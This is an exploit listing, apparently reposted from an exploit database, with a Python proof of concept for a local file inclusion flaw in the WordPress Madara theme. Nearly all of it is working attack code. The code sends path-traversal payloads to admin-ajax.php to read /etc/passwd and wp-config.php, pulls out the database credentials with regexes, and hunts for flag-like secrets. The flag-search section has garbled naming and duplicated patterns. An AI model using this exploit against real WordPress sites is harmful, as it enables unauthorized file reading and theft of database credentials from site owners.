Share
## https://sploitus.com/exploit?id=PACKETSTORM:220776
==================================================================================================================================
    | # Title     : WordPress Madera 2.2.2 Local File Inclusion Exploit                                                              |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://mangabooth.com/product/wp-manga-theme-madara/                                                            |
    ==================================================================================================================================
    
    [+] Summary    : This Python script exploits a Local File Inclusion (CVE-2025-4524) vulnerability in the WordPress Madara theme. 
                     It interacts with the admin-ajax.php endpoint to load sensitive files from the server, potentially leading to the exposure of system or application data.
    
    [+] POC        :  
    
    import requests
    import sys
    import re
    
    class MadaraLFIExploit:
        def __init__(self, target):
            self.target = target.rstrip('/')
            self.ajax_url = f"{self.target}/wp-admin/admin-ajax.php"
            self.session = requests.Session()
            
        def read_file(self, filepath):
            """
          Reading a file via LFI filepath: The file path (e.g., /etc/passwd or ../../wp-config.php)
            """
    
            payload = {
                'action': 'madara_load_more',
                'page': '1',
                'template': f'plugins/../../../../../../..{filepath}',
                'vars[orderby]': 'meta_value_num',
                'vars[paged]': '1',
                'vars[timerange]': '',
                'vars[posts_per_page]': '16',
                'vars[tax_query][relation]': 'OR',
                'vars[meta_query][0][relation]': 'AND',
                'vars[meta_query][relation]': 'AND',
                'vars[post_type]': 'wp-manga',
                'vars[post_status]': 'publish',
                'vars[meta_key]': '_latest_update',
                'vars[order]': 'desc',
                'vars[sidebar]': 'right',
                'vars[manga_archives_item_layout]': 'big_thumbnail'
            }
            
            headers = {
                'User-Agent': 'Mozilla/5.0 (indoushka; rv:128.0) Gecko/20100101 Firefox/128.0',
                'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
                'X-Requested-With': 'XMLHttpRequest'
            }
            
            try:
                response = self.session.post(
                    self.ajax_url,
                    data=payload,
                    headers=headers,
                    timeout=10
                )
    
                if response.status_code == 200 and len(response.text) > 50:
                    return response.text
                else:
                    return None
                    
            except Exception as e:
                print(f"[-] Error: {e}")
                return None
        
        def read_config_file(self):
            """Read wp-config.php (contains database credentials)"""
    
            paths = [
                '/wp-config.php',
                '/../wp-config.php',
                '../../wp-config.php',
                '../../../wp-config.php'
            ]
            
            for path in paths:
                print(f"[*] Trying: {path}")
                content = self.read_file(path)
                if content and 'DB_NAME' in content and 'DB_PASSWORD' in content:
                    print("[+] Found wp-config.php!")
                    db_patterns = {
                        'DB_NAME': r"define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'",
                        'DB_USER': r"define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'",
                        'DB_PASSWORD': r"define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'",
                        'DB_HOST': r"define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'"
                    }
                    
                    for key, pattern in db_patterns.items():
                        match = re.search(pattern, content)
                        if match:
                            print(f"[+] {key}: {match.group(1)}")
                    
                    return content
            
            return None
        
        def find_indoushka(self):
            """Searching for indoushkas in popular files"""
            common_files = [
                '/indoushka.txt',
                '/root/indoushka.txt',
                '/home/indoushka/indoushka.txt',
                '/var/www/indoushka.txt',
                '/tmp/indoushka.txt',
                '../../../indoushka.txt',
                '../../../../indoushka.txt'
            ]
            
            for filepath in common_files:
                print(f"[*] Checking {filepath}")
                content = self.read_file(filepath)
                if content:
    
                    patterns = [
                        r'indoushka\{[^}]+\}',
                        r'indoushka\{[^}]+\}',
                        r'indoushka\{[^}]+\}',
                        r'\{FLG:[^}]+\}',
                        r'[A-Z0-9]{32,}',
                        r'[a-f0-9]{32,}'
                    ]
                    
                    for pattern in patterns:
                        matches = re.findall(pattern, content)
                        if matches:
                            print(f"[YEP] indoushka FOUND: {matches[0]}")
                            return matches[0]
            print("[*] Trying to read sensitive WordPress files...")
            wp_files = [
                '/wp-config.php',
                '/wp-content/plugins/madara/functions.php',
                '/wp-content/themes/madara/style.css'
            ]
            
            for wp_file in wp_files:
                content = self.read_file(wp_file)
                if content and ('indoushka' in content.lower() or 'indoushka' in content.lower()):
                    print(f"[+] Interesting content in {wp_file}:")
                    print(content[:500])
            
            return None
    if __name__ == "__main__":
        target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
        
        exploit = MadaraLFIExploit(target)
        
        print("[*] Testing LFI vulnerability...")
        test_content = exploit.read_file('/etc/passwd')
        
        if test_content and 'root:' in test_content:
            print("[+] LFI confirmed! /etc/passwd read successfully")
            print("\n[*] Searching for indoushka...")
            indoushka = exploit.find_indoushka()
            
            if not indoushka:
                print("[*] Trying to read database config...")
                exploit.read_config_file()
        else:
            print("[-] LFI might not work. Trying alternative payload...")
    
            test_content = exploit.read_file('../../../wp-config.php')
            if test_content and 'DB_NAME' in test_content:
                print("[+] LFI confirmed via wp-config.php!")
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================